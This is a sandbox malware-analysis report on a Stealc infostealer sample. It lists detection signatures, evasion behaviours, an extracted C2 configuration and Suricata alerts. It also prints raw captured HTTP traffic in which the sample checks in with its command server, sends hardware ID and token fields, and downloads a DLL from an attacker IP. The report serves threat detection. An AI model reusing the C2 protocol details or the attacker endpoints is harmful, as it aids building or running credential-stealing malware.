Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1502482
MD5:	e327e97714aa25537fde40f3c48efde7
SHA1:	428bbb6bf12584eda0e0d9c7ba8451e792e08507
SHA256:	2d4680a8ec9567082b77baef594ca11f2a509c4bae189a239855e00d357c7a34
Tags:	exe
Infos:

Detection

Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Powershell download and execute

Yara detected Stealc

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Downloads executable code via HTTP

Entry point lies outside standard sections

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 3424 cmdline: "C:\Users\user\Desktop\file.exe" MD5: E327E97714AA25537FDE40F3C48EFDE7)

WerFault.exe (PID: 4292 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3424 -s 1600 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Process Memory Space: file.exe PID: 3424	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 3424	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 3424	JoeSecurity_Stealc	Yara detected Stealc	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern HCa - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T20:54:06.895741+0200
SID:	2803304
Severity:	3
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE Win32/Stealc Submitting System Information to C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T20:54:06.322810+0200
SID:	2044248
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Requesting browsers Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T20:53:59.714165+0200
SID:	2044244
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-09-01T20:54:03.639606+0200
SID:	2044247
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Requesting plugins Config from C2 - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T20:54:00.006452+0200
SID:	2044246
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.5 - Destination IP: 185.215.113.100

Timestamp:	2024-09-01T20:53:59.416144+0200
SID:	2044243
Severity:	1
Source Port:	49704
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config - Source IP: 185.215.113.100 - Destination IP: 192.168.2.5

Timestamp:	2024-09-01T20:53:59.720314+0200
SID:	2044245
Severity:	1
Source Port:	80
Destination Port:	49704
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll	URL Reputation: Label: malware
Source: http://185.215.113.100	URL Reputation: Label: malware
Source: http://185.215.113.100/	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpWm	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllq	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpUser	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpx	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php7mH	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllc	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp

Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.100/e2b1563c6670f193.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.100/e2b1563c6670f193.phpUser	Virustotal: Detection: 15%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Virustotal: Detection: 6%	Perma Link
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllq	Virustotal: Detection: 18%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ	Virustotal: Detection: 15%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpinit.exe	Virustotal: Detection: 17%	Perma Link
Source: http://185.215.113.100/e2b1563c6670f193.phpx	Virustotal: Detection: 11%	Perma Link
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dllc	Virustotal: Detection: 18%	Perma Link

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 41%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: http://185.215.113.100/e2b1563c6670f193.php

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 01 Sep 2024 18:54:06 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGCBGCAFIIECBFIDHIJKHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 42 47 43 41 46 49 49 45 43 42 46 49 44 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BGCBGCAFIIECBFIDHIJKContent-Disposition: form-data; name="message"browsers------BGCBGCAFIIECBFIDHIJK--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KFIIJJJDGCBAAKFIIECGHost: 185.215.113.100Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 49 4a 4a 4a 44 47 43 42 41 41 4b 46 49 49 45 43 47 2d 2d 0d 0a Data Ascii: ------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------KFIIJJJDGCBAAKFIIECGContent-Disposition: form-data; name="message"plugins------KFIIJJJDGCBAAKFIIECG--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJKJEHJJDAKECBFCGIDHost: 185.215.113.100Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 64 31 33 31 35 30 64 31 63 36 63 33 35 36 38 64 34 66 39 63 35 62 33 37 64 64 38 65 66 66 33 66 36 35 35 62 66 37 66 66 38 38 62 63 38 33 63 31 36 37 30 33 30 39 37 61 33 34 30 33 63 64 63 62 32 66 34 65 37 37 65 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 4a 4b 4a 45 48 4a 4a 44 41 4b 45 43 42 46 43 47 49 44 2d 2d 0d 0a Data Ascii: ------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="token"2d13150d1c6c3568d4f9c5b37dd8eff3f655bf7ff88bc83c16703097a3403cdcb2f4e77e------BKJKJEHJJDAKECBFCGIDContent-Disposition: form-data; name="message"fplugins------BKJKJEHJJDAKECBFCGID--
Source: global traffic	HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCFIDAFBFBAKFHJEGIJHost: 185.215.113.100Content-Length: 5531Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache

Source: Joe Sandbox View

IP Address: 185.215.113.100 185.215.113.100

Source: Joe Sandbox View

ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL

Source: Network traffic

Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.5:49704 -> 185.215.113.100:80

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.100

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.100Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /0d60be0de163924d/sqlite3.dll HTTP/1.1Host: 185.215.113.100Cache-Control: no-cache

Source: unknown

HTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BKFCAFCFBAEHIDHJDBGCHost: 185.215.113.100Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 30 45 33 30 31 41 33 36 35 42 30 33 35 35 35 35 31 34 32 33 32 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6c 65 76 61 0d 0a 2d 2d 2d 2d 2d 2d 42 4b 46 43 41 46 43 46 42 41 45 48 49 44 48 4a 44 42 47 43 2d 2d 0d 0a Data Ascii: ------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="hwid"F0E301A365B03555514232------BKFCAFCFBAEHIDHJDBGCContent-Disposition: form-data; name="build"leva------BKFCAFCFBAEHIDHJDBGC--

Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.000000000119E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100
Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/
Source: file.exe, 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dll
Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllc
Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/0d60be0de163924d/sqlite3.dllq
Source: file.exe, 00000000.00000002.2800489909.000000000038A000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2801350861.0000000001212000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.php7mH
Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpUser
Source: file.exe, 00000000.00000002.2801350861.00000000011F6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpWm
Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZ
Source: file.exe, 00000000.00000002.2800489909.000000000035C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpinit.exe
Source: file.exe, 00000000.00000002.2800489909.00000000004CD000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: http://185.215.113.100/e2b1563c6670f193.phpion:
